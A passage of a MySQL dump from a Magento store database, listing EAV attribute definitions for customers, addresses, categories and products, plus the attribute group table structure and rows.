(15, 1, 'default_billing', NULL, 'Magento\\Customer\\Model\\Customer\\Attribute\\Backend\\Billing', 'static', NULL, NULL, 'text', 'Default Billing Address', NULL, NULL, 0, 0, NULL, 0, NULL),
(16, 1, 'default_shipping', NULL, 'Magento\\Customer\\Model\\Customer\\Attribute\\Backend\\Shipping', 'static', NULL, NULL, 'text', 'Default Shipping Address', NULL, NULL, 0, 0, NULL, 0, NULL),
(17, 1, 'taxvat', NULL, NULL, 'static', NULL, NULL, 'text', 'Tax/VAT Number', NULL, NULL, 0, 0, NULL, 0, NULL),
(18, 1, 'confirmation', NULL, NULL, 'static', NULL, NULL, 'text', 'Is Confirmed', NULL, NULL, 0, 0, NULL, 0, NULL),
(19, 1, 'created_at', NULL, NULL, 'static', NULL, NULL, 'date', 'Created At', NULL, NULL, 0, 0, NULL, 0, NULL),
(20, 1, 'gender', NULL, NULL, 'static', NULL, NULL, 'select', 'Gender', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Source\\Table', 0, 0, NULL, 0, NULL),
(21, 1, 'disable_auto_group_change', 'Magento\\Customer\\Model\\Attribute', 'Magento\\Customer\\Model\\Attribute\\Backend\\Data\\Boolean', 'static', NULL, NULL, 'boolean', 'Disable Automatic Group Change Based on VAT ID', NULL, NULL, 0, 0, NULL, 0, NULL),
(22, 2, 'prefix', NULL, NULL, 'static', NULL, NULL, 'text', 'Name Prefix', NULL, NULL, 0, 0, NULL, 0, NULL),
(23, 2, 'firstname', NULL, NULL, 'static', NULL, NULL, 'text', 'First Name', NULL, NULL, 1, 0, NULL, 0, NULL),
(24, 2, 'middlename', NULL, NULL, 'static', NULL, NULL, 'text', 'Middle Name/Initial', NULL, NULL, 0, 0, NULL, 0, NULL),
(25, 2, 'lastname', NULL, NULL, 'static', NULL, NULL, 'text', 'Last Name', NULL, NULL, 1, 0, NULL, 0, NULL),
(26, 2, 'suffix', NULL, NULL, 'static', NULL, NULL, 'text', 'Name Suffix', NULL, NULL, 0, 0, NULL, 0, NULL),
(27, 2, 'company', NULL, NULL, 'static', NULL, NULL, 'text', 'Company', NULL, NULL, 0, 0, NULL, 0, NULL),
(28, 2, 'street', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Backend\\DefaultBackend', 'static', NULL, NULL, 'multiline', 'Street Address', NULL, NULL, 1, 0, NULL, 0, NULL),
(29, 2, 'city', NULL, NULL, 'static', NULL, NULL, 'text', 'City', NULL, NULL, 1, 0, NULL, 0, NULL),
(30, 2, 'country_id', NULL, NULL, 'static', NULL, NULL, 'select', 'Country', NULL, 'Magento\\Customer\\Model\\ResourceModel\\Address\\Attribute\\Source\\Country', 1, 0, NULL, 0, NULL),
(31, 2, 'region', NULL, 'Magento\\Customer\\Model\\ResourceModel\\Address\\Attribute\\Backend\\Region', 'static', NULL, NULL, 'text', 'State/Province', NULL, NULL, 0, 0, NULL, 0, NULL),
(32, 2, 'region_id', NULL, NULL, 'static', NULL, NULL, 'hidden', 'State/Province', NULL, 'Magento\\Customer\\Model\\ResourceModel\\Address\\Attribute\\Source\\Region', 0, 0, NULL, 0, NULL),
(33, 2, 'postcode', NULL, NULL, 'static', NULL, NULL, 'text', 'Zip/Postal Code', NULL, NULL, 0, 0, NULL, 0, NULL),
(34, 2, 'telephone', NULL, NULL, 'static', NULL, NULL, 'text', 'Phone Number', NULL, NULL, 1, 0, NULL, 0, NULL),
(35, 2, 'fax', NULL, NULL, 'static', NULL, NULL, 'text', 'Fax', NULL, NULL, 0, 0, NULL, 0, NULL),
(36, 2, 'vat_id', 'Magento\\Customer\\Model\\Attribute', NULL, 'static', NULL, NULL, 'text', 'VAT Number', NULL, NULL, 0, 0, NULL, 0, NULL),
(37, 2, 'vat_is_valid', NULL, NULL, 'static', NULL, NULL, 'text', 'VAT number validity', NULL, NULL, 0, 0, NULL, 0, NULL),
(38, 2, 'vat_request_id', NULL, NULL, 'static', NULL, NULL, 'text', 'VAT number validation request ID', NULL, NULL, 0, 0, NULL, 0, NULL),
(39, 2, 'vat_request_date', NULL, NULL, 'static', NULL, NULL, 'text', 'VAT number validation request date', NULL, NULL, 0, 0, NULL, 0, NULL),
(40, 2, 'vat_request_success', NULL, NULL, 'static', NULL, NULL, 'text', 'VAT number validation request success', NULL, NULL, 0, 0, NULL, 0, NULL),
(41, 1, 'updated_at', NULL, NULL, 'static', NULL, NULL, 'date', 'Updated At', NULL, NULL, 0, 0, NULL, 0, NULL),
(42, 1, 'failures_num', NULL, NULL, 'static', NULL, NULL, 'hidden', 'Failures Number', NULL, NULL, 0, 0, NULL, 0, NULL),
(43, 1, 'first_failure', NULL, NULL, 'static', NULL, NULL, 'date', 'First Failure Date', NULL, NULL, 0, 0, NULL, 0, NULL),
(44, 1, 'lock_expires', NULL, NULL, 'static', NULL, NULL, 'date', 'Failures Number', NULL, NULL, 0, 0, NULL, 0, NULL),
(45, 3, 'name', NULL, NULL, 'varchar', NULL, NULL, 'text', 'Name', NULL, NULL, 1, 0, NULL, 0, NULL),
(46, 3, 'is_active', NULL, NULL, 'int', NULL, NULL, 'select', 'Is Active', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Source\\Boolean', 1, 0, NULL, 0, NULL),
(47, 3, 'description', NULL, NULL, 'text', NULL, NULL, 'textarea', 'Description', NULL, NULL, 0, 0, NULL, 0, NULL),
(48, 3, 'image', NULL, 'Magento\\Catalog\\Model\\Category\\Attribute\\Backend\\Image', 'varchar', NULL, NULL, 'image', 'Image', NULL, NULL, 0, 0, NULL, 0, NULL),
(49, 3, 'meta_title', NULL, NULL, 'varchar', NULL, NULL, 'text', 'Page Title', NULL, NULL, 0, 0, NULL, 0, NULL),
(50, 3, 'meta_keywords', NULL, NULL, 'text', NULL, NULL, 'textarea', 'Meta Keywords', NULL, NULL, 0, 0, NULL, 0, NULL),
(51, 3, 'meta_description', NULL, NULL, 'text', NULL, NULL, 'textarea', 'Meta Description', NULL, NULL, 0, 0, NULL, 0, NULL),
(52, 3, 'display_mode', NULL, NULL, 'varchar', NULL, NULL, 'select', 'Display Mode', NULL, 'Magento\\Catalog\\Model\\Category\\Attribute\\Source\\Mode', 0, 0, NULL, 0, NULL),
(53, 3, 'landing_page', NULL, NULL, 'int', NULL, NULL, 'select', 'CMS Block', NULL, 'Magento\\Catalog\\Model\\Category\\Attribute\\Source\\Page', 0, 0, NULL, 0, NULL),
(54, 3, 'is_anchor', NULL, NULL, 'int', NULL, NULL, 'select', 'Is Anchor', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Source\\Boolean', 0, 0, '1', 0, NULL),
(55, 3, 'path', NULL, NULL, 'static', NULL, NULL, 'text', 'Path', NULL, NULL, 0, 0, NULL, 0, NULL),
(56, 3, 'position', NULL, NULL, 'static', NULL, NULL, 'text', 'Position', NULL, NULL, 0, 0, NULL, 0, NULL),
(57, 3, 'all_children', NULL, NULL, 'text', NULL, NULL, 'text', NULL, NULL, NULL, 0, 0, NULL, 0, NULL),
(58, 3, 'path_in_store', NULL, NULL, 'text', NULL, NULL, 'text', NULL, NULL, NULL, 0, 0, NULL, 0, NULL),
(59, 3, 'children', NULL, NULL, 'text', NULL, NULL, 'text', NULL, NULL, NULL, 0, 0, NULL, 0, NULL),
(60, 3, 'custom_design', NULL, NULL, 'varchar', NULL, NULL, 'select', 'Custom Design', NULL, 'Magento\\Theme\\Model\\Theme\\Source\\Theme', 0, 0, NULL, 0, NULL),
(61, 3, 'custom_design_from', 'Magento\\Catalog\\Model\\ResourceModel\\Eav\\Attribute', 'Magento\\Catalog\\Model\\Attribute\\Backend\\Startdate', 'datetime', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Frontend\\Datetime', 'date', 'Active From', NULL, NULL, 0, 0, NULL, 0, NULL),
(62, 3, 'custom_design_to', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Backend\\Datetime', 'datetime', NULL, NULL, 'date', 'Active To', NULL, NULL, 0, 0, NULL, 0, NULL),
(63, 3, 'page_layout', NULL, NULL, 'varchar', NULL, NULL, 'select', 'Page Layout', NULL, 'Magento\\Catalog\\Model\\Category\\Attribute\\Source\\Layout', 0, 0, NULL, 0, NULL),
(64, 3, 'custom_layout_update', NULL, 'Magento\\Catalog\\Model\\Attribute\\Backend\\Customlayoutupdate', 'text', NULL, NULL, 'textarea', 'Custom Layout Update', NULL, NULL, 0, 0, NULL, 0, NULL),
(65, 3, 'level', NULL, NULL, 'static', NULL, NULL, 'text', 'Level', NULL, NULL, 0, 0, NULL, 0, NULL),
(66, 3, 'children_count', NULL, NULL, 'static', NULL, NULL, 'text', 'Children Count', NULL, NULL, 0, 0, NULL, 0, NULL),
(67, 3, 'available_sort_by', NULL, 'Magento\\Catalog\\Model\\Category\\Attribute\\Backend\\Sortby', 'text', NULL, NULL, 'multiselect', 'Available Product Listing Sort By', NULL, 'Magento\\Catalog\\Model\\Category\\Attribute\\Source\\Sortby', 1, 0, NULL, 0, NULL),
(68, 3, 'default_sort_by', NULL, 'Magento\\Catalog\\Model\\Category\\Attribute\\Backend\\Sortby', 'varchar', NULL, NULL, 'select', 'Default Product Listing Sort By', NULL, 'Magento\\Catalog\\Model\\Category\\Attribute\\Source\\Sortby', 1, 0, NULL, 0, NULL),
(69, 3, 'include_in_menu', NULL, NULL, 'int', NULL, NULL, 'select', 'Include in Navigation Menu', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Source\\Boolean', 1, 0, '1', 0, NULL),
(70, 3, 'custom_use_parent_settings', NULL, NULL, 'int', NULL, NULL, 'select', 'Use Parent Category Settings', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Source\\Boolean', 0, 0, NULL, 0, NULL),
(71, 3, 'custom_apply_to_products', NULL, NULL, 'int', NULL, NULL, 'select', 'Apply To Products', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Source\\Boolean', 0, 0, NULL, 0, NULL),
(72, 3, 'filter_price_range', NULL, NULL, 'decimal', NULL, NULL, 'text', 'Layered Navigation Price Step', NULL, NULL, 0, 0, NULL, 0, NULL),
(73, 4, 'name', 'Magento\\Catalog\\Model\\ResourceModel\\Eav\\Attribute', NULL, 'varchar', NULL, NULL, 'text', 'Product Name', 'validate-length maximum-length-255', NULL, 1, 0, NULL, 0, NULL),
(74, 4, 'sku', 'Magento\\Catalog\\Model\\ResourceModel\\Eav\\Attribute', 'Magento\\Catalog\\Model\\Product\\Attribute\\Backend\\Sku', 'static', NULL, NULL, 'text', 'SKU', 'validate-length maximum-length-64', NULL, 1, 0, NULL, 1, NULL),
(75, 4, 'description', NULL, NULL, 'text', NULL, NULL, 'textarea', 'Description', NULL, NULL, 0, 0, NULL, 0, NULL),
(76, 4, 'short_description', NULL, NULL, 'text', NULL, NULL, 'textarea', 'Short Description', NULL, NULL, 0, 0, NULL, 0, NULL),
(77, 4, 'price', 'Magento\\Catalog\\Model\\ResourceModel\\Eav\\Attribute', 'Magento\\Catalog\\Model\\Product\\Attribute\\Backend\\Price', 'decimal', NULL, NULL, 'price', 'Price', NULL, NULL, 1, 0, NULL, 0, NULL),
(78, 4, 'special_price', 'Magento\\Catalog\\Model\\ResourceModel\\Eav\\Attribute', 'Magento\\Catalog\\Model\\Product\\Attribute\\Backend\\Price', 'decimal', NULL, NULL, 'price', 'Special Price', NULL, NULL, 0, 0, NULL, 0, NULL),
(79, 4, 'special_from_date', NULL, 'Magento\\Catalog\\Model\\Attribute\\Backend\\Startdate', 'datetime', NULL, NULL, 'date', 'Special Price From Date', NULL, NULL, 0, 0, NULL, 0, NULL),
(80, 4, 'special_to_date', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Backend\\Datetime', 'datetime', NULL, NULL, 'date', 'Special Price To Date', NULL, NULL, 0, 0, NULL, 0, NULL),
(81, 4, 'cost', NULL, 'Magento\\Catalog\\Model\\Product\\Attribute\\Backend\\Price', 'decimal', NULL, NULL, 'price', 'Cost', NULL, NULL, 0, 1, NULL, 0, NULL),
(82, 4, 'weight', NULL, 'Magento\\Catalog\\Model\\Product\\Attribute\\Backend\\Weight', 'decimal', NULL, NULL, 'weight', 'Weight', NULL, NULL, 0, 0, NULL, 0, NULL),
(83, 4, 'manufacturer', NULL, NULL, 'int', NULL, NULL, 'select', 'Manufacturer', NULL, NULL, 0, 1, NULL, 0, NULL),
(84, 4, 'meta_title', NULL, NULL, 'varchar', NULL, NULL, 'text', 'Meta Title', NULL, NULL, 0, 0, NULL, 0, NULL),
(85, 4, 'meta_keyword', NULL, NULL, 'text', NULL, NULL, 'textarea', 'Meta Keywords', NULL, NULL, 0, 0, NULL, 0, NULL),
(86, 4, 'meta_description', NULL, NULL, 'varchar', NULL, NULL, 'textarea', 'Meta Description', NULL, NULL, 0, 0, NULL, 0, 'Maximum 255 chars. Meta Description should optimally be between 150-160 characters'),
(87, 4, 'image', NULL, NULL, 'varchar', NULL, 'Magento\\Catalog\\Model\\Product\\Attribute\\Frontend\\Image', 'media_image', 'Base', NULL, NULL, 0, 0, NULL, 0, NULL),
(88, 4, 'small_image', NULL, NULL, 'varchar', NULL, 'Magento\\Catalog\\Model\\Product\\Attribute\\Frontend\\Image', 'media_image', 'Small', NULL, NULL, 0, 0, NULL, 0, NULL),
(89, 4, 'thumbnail', NULL, NULL, 'varchar', NULL, 'Magento\\Catalog\\Model\\Product\\Attribute\\Frontend\\Image', 'media_image', 'Thumbnail', NULL, NULL, 0, 0, NULL, 0, NULL),
(90, 4, 'media_gallery', NULL, NULL, 'static', NULL, NULL, 'gallery', 'Media Gallery', NULL, NULL, 0, 0, NULL, 0, NULL),
(91, 4, 'old_id', NULL, NULL, 'int', NULL, NULL, 'text', NULL, NULL, NULL, 0, 0, NULL, 0, NULL),
(92, 4, 'tier_price', NULL, 'Magento\\Catalog\\Model\\Product\\Attribute\\Backend\\Tierprice', 'decimal', NULL, NULL, 'text', 'Tier Price', NULL, NULL, 0, 0, NULL, 0, NULL),
(93, 4, 'color', 'Magento\\Catalog\\Model\\ResourceModel\\Eav\\Attribute', NULL, 'int', NULL, NULL, 'select', 'Color', NULL, NULL, 0, 1, '5476', 0, NULL),
(94, 4, 'news_from_date', NULL, 'Magento\\Catalog\\Model\\Attribute\\Backend\\Startdate', 'datetime', NULL, NULL, 'date', 'Set Product as New from Date', NULL, NULL, 0, 0, NULL, 0, NULL),
(95, 4, 'news_to_date', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Backend\\Datetime', 'datetime', NULL, NULL, 'date', 'Set Product as New to Date', NULL, NULL, 0, 0, NULL, 0, NULL),
(96, 4, 'gallery', NULL, NULL, 'varchar', NULL, NULL, 'gallery', 'Image Gallery', NULL, NULL, 0, 0, NULL, 0, NULL),
(97, 4, 'status', NULL, NULL, 'int', NULL, NULL, 'select', 'Enable Product', NULL, 'Magento\\Catalog\\Model\\Product\\Attribute\\Source\\Status', 0, 0, '1', 0, NULL),
(98, 4, 'minimal_price', 'Magento\\Catalog\\Model\\ResourceModel\\Eav\\Attribute', 'Magento\\Catalog\\Model\\Product\\Attribute\\Backend\\Price', 'decimal', NULL, NULL, 'price', 'Minimal Price', NULL, NULL, 0, 0, NULL, 0, NULL),
(99, 4, 'visibility', NULL, NULL, 'int', NULL, NULL, 'select', 'Visibility', NULL, 'Magento\\Catalog\\Model\\Product\\Visibility', 0, 0, '4', 0, NULL),
(100, 4, 'custom_design', NULL, NULL, 'varchar', NULL, NULL, 'select', 'New Theme', NULL, 'Magento\\Theme\\Model\\Theme\\Source\\Theme', 0, 0, NULL, 0, NULL),
(101, 4, 'custom_design_from', NULL, 'Magento\\Catalog\\Model\\Attribute\\Backend\\Startdate', 'datetime', NULL, NULL, 'date', 'Active From', NULL, NULL, 0, 0, NULL, 0, NULL),
(102, 4, 'custom_design_to', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Backend\\Datetime', 'datetime', NULL, NULL, 'date', 'Active To', NULL, NULL, 0, 0, NULL, 0, NULL),
(103, 4, 'custom_layout_update', NULL, 'Magento\\Catalog\\Model\\Attribute\\Backend\\Customlayoutupdate', 'text', NULL, NULL, 'textarea', 'Layout Update XML', NULL, NULL, 0, 0, NULL, 0, NULL),
(104, 4, 'page_layout', NULL, NULL, 'varchar', NULL, NULL, 'select', 'Layout', NULL, 'Magento\\Catalog\\Model\\Product\\Attribute\\Source\\Layout', 0, 0, NULL, 0, NULL),
(105, 4, 'category_ids', NULL, 'Magento\\Catalog\\Model\\Product\\Attribute\\Backend\\Category', 'static', NULL, NULL, 'text', 'Categories', NULL, NULL, 0, 0, NULL, 0, NULL),
(106, 4, 'options_container', NULL, NULL, 'varchar', NULL, NULL, 'select', 'Display Product Options In', NULL, 'Magento\\Catalog\\Model\\Entity\\Product\\Attribute\\Design\\Options\\Container', 0, 0, 'container2', 0, NULL),
(107, 4, 'required_options', NULL, NULL, 'static', NULL, NULL, 'text', NULL, NULL, NULL, 0, 0, NULL, 0, NULL),
(108, 4, 'has_options', NULL, NULL, 'static', NULL, NULL, 'text', NULL, NULL, NULL, 0, 0, NULL, 0, NULL),
(109, 4, 'image_label', NULL, NULL, 'varchar', NULL, NULL, 'text', 'Image Label', NULL, NULL, 0, 0, NULL, 0, NULL),
(110, 4, 'small_image_label', NULL, NULL, 'varchar', NULL, NULL, 'text', 'Small Image Label', NULL, NULL, 0, 0, NULL, 0, NULL),
(111, 4, 'thumbnail_label', NULL, NULL, 'varchar', NULL, NULL, 'text', 'Thumbnail Label', NULL, NULL, 0, 0, NULL, 0, NULL),
(112, 4, 'created_at', NULL, NULL, 'static', NULL, NULL, 'date', NULL, NULL, NULL, 1, 0, NULL, 0, NULL),
(113, 4, 'updated_at', NULL, NULL, 'static', NULL, NULL, 'date', NULL, NULL, NULL, 1, 0, NULL, 0, NULL),
(114, 4, 'country_of_manufacture', NULL, NULL, 'varchar', NULL, NULL, 'select', 'Country of Manufacture', NULL, 'Magento\\Catalog\\Model\\Product\\Attribute\\Source\\Countryofmanufacture', 0, 0, NULL, 0, NULL),
(115, 4, 'quantity_and_stock_status', NULL, 'Magento\\Catalog\\Model\\Product\\Attribute\\Backend\\Stock', 'int', NULL, NULL, 'select', 'Quantity', NULL, 'Magento\\CatalogInventory\\Model\\Source\\Stock', 0, 0, '1', 0, NULL),
(116, 4, 'custom_layout', NULL, NULL, 'varchar', NULL, NULL, 'select', 'New Layout', NULL, 'Magento\\Catalog\\Model\\Product\\Attribute\\Source\\Layout', 0, 0, NULL, 0, NULL),
(117, 4, 'custom_layout_update_file', NULL, 'Magento\\Catalog\\Model\\Product\\Attribute\\Backend\\LayoutUpdate', 'varchar', NULL, NULL, 'select', 'Custom Layout Update', NULL, 'Magento\\Catalog\\Model\\Product\\Attribute\\Source\\LayoutUpdate', 0, 0, NULL, 0, NULL),
(118, 3, 'custom_layout_update_file', NULL, 'Magento\\Catalog\\Model\\Category\\Attribute\\Backend\\LayoutUpdate', 'varchar', NULL, NULL, 'select', 'Custom Layout Update', NULL, 'Magento\\Catalog\\Model\\Category\\Attribute\\Source\\LayoutUpdate', 0, 0, NULL, 0, NULL),
(119, 4, 'msrp', 'Magento\\Catalog\\Model\\ResourceModel\\Eav\\Attribute', 'Magento\\Catalog\\Model\\Product\\Attribute\\Backend\\Price', 'decimal', NULL, NULL, 'price', 'Minimum Advertised Price', NULL, NULL, 0, 0, NULL, 0, NULL),
(120, 4, 'msrp_display_actual_price_type', NULL, 'Magento\\Catalog\\Model\\Product\\Attribute\\Backend\\Boolean', 'varchar', NULL, NULL, 'select', 'Display Actual Price', NULL, 'Magento\\Msrp\\Model\\Product\\Attribute\\Source\\Type\\Price', 0, 0, '0', 0, NULL),
(121, 3, 'url_key', NULL, NULL, 'varchar', NULL, NULL, 'text', 'URL Key', NULL, NULL, 0, 0, NULL, 0, NULL),
(122, 3, 'url_path', NULL, NULL, 'varchar', NULL, NULL, 'text', NULL, NULL, NULL, 0, 0, NULL, 0, NULL),
(123, 4, 'url_key', NULL, NULL, 'varchar', NULL, NULL, 'text', 'URL Key', NULL, NULL, 0, 0, NULL, 0, NULL),
(124, 4, 'url_path', NULL, NULL, 'varchar', NULL, NULL, 'text', NULL, NULL, NULL, 0, 0, NULL, 0, NULL),
(125, 4, 'links_purchased_separately', NULL, NULL, 'int', NULL, NULL, NULL, 'Links can be purchased separately', NULL, NULL, 1, 0, NULL, 0, NULL),
(126, 4, 'samples_title', NULL, NULL, 'varchar', NULL, NULL, NULL, 'Samples title', NULL, NULL, 1, 0, NULL, 0, NULL),
(127, 4, 'links_title', NULL, NULL, 'varchar', NULL, NULL, NULL, 'Links title', NULL, NULL, 1, 0, NULL, 0, NULL),
(128, 4, 'links_exist', NULL, NULL, 'int', NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, 0, NULL),
(129, 4, 'gift_message_available', NULL, 'Magento\\Catalog\\Model\\Product\\Attribute\\Backend\\Boolean', 'varchar', NULL, NULL, 'select', 'Allow Gift Message', NULL, 'Magento\\Catalog\\Model\\Product\\Attribute\\Source\\Boolean', 0, 0, NULL, 0, NULL),
(130, 4, 'merchant_center_category', NULL, NULL, 'int', NULL, NULL, 'select', 'Google Merchant Center Category', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Source\\Table', 0, 1, NULL, 0, NULL),
(131, 4, 'price_type', NULL, NULL, 'int', NULL, NULL, 'boolean', 'Dynamic Price', NULL, NULL, 1, 0, '0', 0, NULL),
(132, 4, 'sku_type', NULL, NULL, 'int', NULL, NULL, 'boolean', 'Dynamic SKU', NULL, NULL, 1, 0, '0', 0, NULL),
(133, 4, 'weight_type', NULL, NULL, 'int', NULL, NULL, 'boolean', 'Dynamic Weight', NULL, NULL, 1, 0, '0', 0, NULL),
(134, 4, 'price_view', NULL, NULL, 'int', NULL, NULL, 'select', 'Price View', NULL, 'Magento\\Bundle\\Model\\Product\\Attribute\\Source\\Price\\View', 1, 0, NULL, 0, NULL),
(135, 4, 'shipment_type', NULL, NULL, 'int', NULL, NULL, 'select', 'Ship Bundle Items', NULL, 'Magento\\Bundle\\Model\\Product\\Attribute\\Source\\Shipment\\Type', 1, 0, '0', 0, NULL),
(136, 4, 'swatch_image', NULL, NULL, 'varchar', NULL, 'Magento\\Catalog\\Model\\Product\\Attribute\\Frontend\\Image', 'media_image', 'Swatch', NULL, NULL, 0, 0, NULL, 0, NULL),
(137, 4, 'tax_class_id', NULL, NULL, 'int', NULL, NULL, 'select', 'Tax Class', NULL, 'Magento\\Tax\\Model\\TaxClass\\Source\\Product', 0, 0, '2', 0, NULL),
(138, 4, 'activity', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Backend\\ArrayBackend', 'varchar', NULL, NULL, 'multiselect', 'Activity', NULL, NULL, 0, 1, '', 0, NULL),
(139, 4, 'style_bags', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Backend\\ArrayBackend', 'varchar', NULL, NULL, 'multiselect', 'Style Bags', NULL, NULL, 0, 1, '', 0, NULL),
(140, 4, 'material', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Backend\\ArrayBackend', 'varchar', NULL, NULL, 'multiselect', 'Material', NULL, NULL, 0, 1, '', 0, NULL),
(141, 4, 'strap_bags', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Backend\\ArrayBackend', 'varchar', NULL, NULL, 'multiselect', 'Strap/Handle', NULL, NULL, 0, 1, '', 0, NULL),
(142, 4, 'features_bags', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Backend\\ArrayBackend', 'varchar', NULL, NULL, 'multiselect', 'Features', NULL, NULL, 0, 1, '', 0, NULL),
(143, 4, 'gender', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Backend\\ArrayBackend', 'varchar', NULL, NULL, 'multiselect', 'Gender', NULL, NULL, 0, 1, '', 0, NULL),
(144, 4, 'category_gear', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Backend\\ArrayBackend', 'varchar', NULL, NULL, 'multiselect', 'Category Gear', NULL, NULL, 0, 1, '', 0, NULL),
(145, 4, 'size', NULL, NULL, 'int', NULL, NULL, 'select', 'Size', NULL, NULL, 0, 1, '5518', 0, NULL),
(146, 4, 'eco_collection', NULL, NULL, 'int', NULL, NULL, 'boolean', 'Eco Collection', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Source\\Boolean', 0, 1, '', 0, NULL),
(147, 4, 'performance_fabric', NULL, NULL, 'int', NULL, NULL, 'boolean', 'Performance Fabric', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Source\\Boolean', 0, 1, '', 0, NULL),
(148, 4, 'erin_recommends', NULL, NULL, 'int', NULL, NULL, 'boolean', 'Erin Recommends', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Source\\Boolean', 0, 1, '', 0, NULL),
(149, 4, 'new', NULL, NULL, 'int', NULL, NULL, 'boolean', 'New', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Source\\Boolean', 0, 1, '', 0, NULL),
(150, 4, 'sale', NULL, NULL, 'int', NULL, NULL, 'boolean', 'Sale', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Source\\Boolean', 0, 1, '', 0, NULL),
(151, 4, 'format', NULL, NULL, 'int', NULL, NULL, 'select', 'Format', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Source\\Table', 0, 1, '', 0, NULL),
(152, 4, 'style_bottom', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Backend\\ArrayBackend', 'varchar', NULL, NULL, 'multiselect', 'Style Bottom', NULL, NULL, 0, 1, '', 0, NULL),
(153, 4, 'style_general', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Backend\\ArrayBackend', 'varchar', NULL, NULL, 'multiselect', 'Style General', NULL, NULL, 0, 1, '', 0, NULL),
(154, 4, 'sleeve', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Backend\\ArrayBackend', 'varchar', NULL, NULL, 'multiselect', 'Sleeve', NULL, NULL, 0, 1, '', 0, NULL),
(155, 4, 'collar', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Backend\\ArrayBackend', 'varchar', NULL, NULL, 'multiselect', 'Collar', NULL, NULL, 0, 1, '', 0, NULL),
(156, 4, 'pattern', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Backend\\ArrayBackend', 'varchar', NULL, NULL, 'multiselect', 'Pattern', NULL, NULL, 0, 1, '', 0, NULL),
(157, 4, 'climate', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Backend\\ArrayBackend', 'varchar', NULL, NULL, 'multiselect', 'Climate', NULL, NULL, 0, 1, '', 0, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `eav_attribute_group`
--

CREATE TABLE `eav_attribute_group` (
  `attribute_group_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Attribute Group ID',
  `attribute_set_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute Set ID',
  `attribute_group_name` varchar(255) DEFAULT NULL COMMENT 'Attribute Group Name',
  `sort_order` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Sort Order',
  `default_id` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Default ID',
  `attribute_group_code` varchar(255) NOT NULL COMMENT 'Attribute Group Code',
  `tab_group_code` varchar(255) DEFAULT NULL COMMENT 'Tab Group Code'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Eav Attribute Group';

--
-- Dumping data for table `eav_attribute_group`
--

INSERT INTO `eav_attribute_group` (`attribute_group_id`, `attribute_set_id`, `attribute_group_name`, `sort_order`, `default_id`, `attribute_group_code`, `tab_group_code`) VALUES
(1, 1, 'General', 1, 1, 'general', NULL),
(2, 2, 'General', 1, 1, 'general', NULL),
(3, 3, 'General', 10, 1, 'general', NULL),
(4, 3, 'General Information', 2, 0, 'general-information', NULL),
(5, 3, 'Display Settings', 20, 0, 'display-settings', NULL),
(6, 3, 'Custom Design', 30, 0, 'custom-design', NULL),
(7, 4, 'Product Details', 10, 1, 'product-details', 'basic'),
(8, 4, 'Advanced Pricing', 40, 0, 'advanced-pricing', 'advanced'),
(9, 4, 'Search Engine Optimization', 30, 0, 'search-engine-optimization', 'basic'),
(10, 4, 'Images', 20, 0, 'image-management', 'basic'),
(11, 4, 'Design', 50, 0, 'design', 'advanced'),
(12, 4, 'Autosettings', 60, 0, 'autosettings', 'advanced'),
(13, 4, 'Content', 15, 0, 'content', 'basic'),
(14, 4, 'Schedule Design Update', 55, 0, 'schedule-design-update', 'advanced'),
(15, 5, 'General', 1, 1, 'general', NULL),
(16, 6, 'General', 1, 1, 'general', NULL),
(17, 7, 'General', 1, 1, 'general', NULL),
(18, 8, 'General', 1, 1, 'general', NULL),
(19, 4, 'Gift Options', 61, 0, 'gift-options', NULL),
(20, 4, 'Bundle Items', 16, 0, 'bundle-items', NULL),
(21, 9, 'Gift Options', 61, 0, 'gift-options', NULL),
(22, 9, 'Autosettings', 60, 0, 'autosettings', 'advanced'),
(23, 9, 'Schedule Design Update', 55, 0, 'schedule-design-update', 'advanced'),
(24, 9, 'Design', 50, 0, 'design', 'advanced'),
(25, 9, 'Advanced Pricing', 40, 0, 'advanced-pricing', 'advanced'),
(26, 9, 'Search Engine Optimization', 30, 0, 'search-engine-optimization', 'basic'),
(27, 9, 'Images', 20, 0, 'image-management', 'basic'),
(28, 9, 'Bundle Items', 16, 0, 'bundle-items', NULL),
(29, 9, 'Content', 15, 0, 'content', 'basic'),
(30, 9, 'Product Details', 10, 1, 'product-details', 'basic'),
(31, 10, 'Gift Options', 61, 0, 'gift-options', NULL),
(32, 10, 'Autosettings', 60, 0, 'autosettings', 'advanced'),
